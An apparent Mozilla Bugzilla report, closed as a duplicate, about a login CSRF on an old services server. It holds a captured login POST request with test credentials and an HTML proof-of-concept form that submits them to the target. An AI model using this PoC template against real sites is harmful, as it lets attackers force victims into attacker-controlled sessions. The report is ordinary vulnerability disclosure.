CSRF vulnerability in accounts.services.mozilla.com

RESOLVED DUPLICATE of bug 772818

Status

RESOLVED DUPLICATE of bug 772818
4 years ago
3 years ago

People

(Reporter: lalithr95, Unassigned)

Tracking

Details

(Reporter)

Description

4 years ago
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Build ID: 20140410211200

Steps to reproduce:

CSRF vulnerability in mozilla 

URL  : https://63.245.217.128/

The Login request doesnot  have valid protection against CSRF attacks .
Here is the request 

POST / HTTP/1.1
Host: 63.245.217.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://63.245.217.128/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

username=abhijeth0423%40gmail.com&password=testadmin

CSRF POC :
<html>

  <body>
    <form action="https://63.245.217.128/" method="POST">
      <input type="hidden" name="username" value="abhijeth0423&#64;gmail&#46;com" />
      <input type="hidden" name="password" value="testadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



Actual results:

Using above vulnerability an attacker can make victim to login into some test account and the observing the changes or actions made by the victim . This is prevented by using either an authenticated token or CSRF token .


Expected results:

The Login form need to be protected with an authentication token as one of the paramters in the Login form . This will prevent CSRF vulnerability .

Updated

4 years ago
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Core → mozilla.org
QA Contact: shyam
Version: 28 Branch → other
(Reporter)

Comment 1

4 years ago
Please add sec-bounty flag ! 

Regards

Comment 2

4 years ago
As best I can tell this is the old sync service, and signing in with a test account on the web won't do anything in terms of actually syncing anything behaviour-wise. I also see an SSL cert warning if I use the instructions as written, because the IP address doesn't match the cert. Going to https://services.mozilla.com/ doesn't show the same page as ignoring the cert warning. In other words, I'm not sure there's anything to be worried about here.

Richard, can you clarify some more?
Flags: needinfo?(rnewman)
Yeah, that machine is account01.phx.services.mozilla.com, which will be decommissioned soon. And this is a dupe.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Flags: needinfo?(rnewman)
Resolution: --- → DUPLICATE
Summary: CSRF vulnerability in mozilla subd-domain → CSRF vulnerability in accounts.services.mozilla.com
Duplicate of bug: 772818
Product: mozilla.org → mozilla.org Graveyard
Group: core-security
You need to log in before you can comment on or make changes to this bug.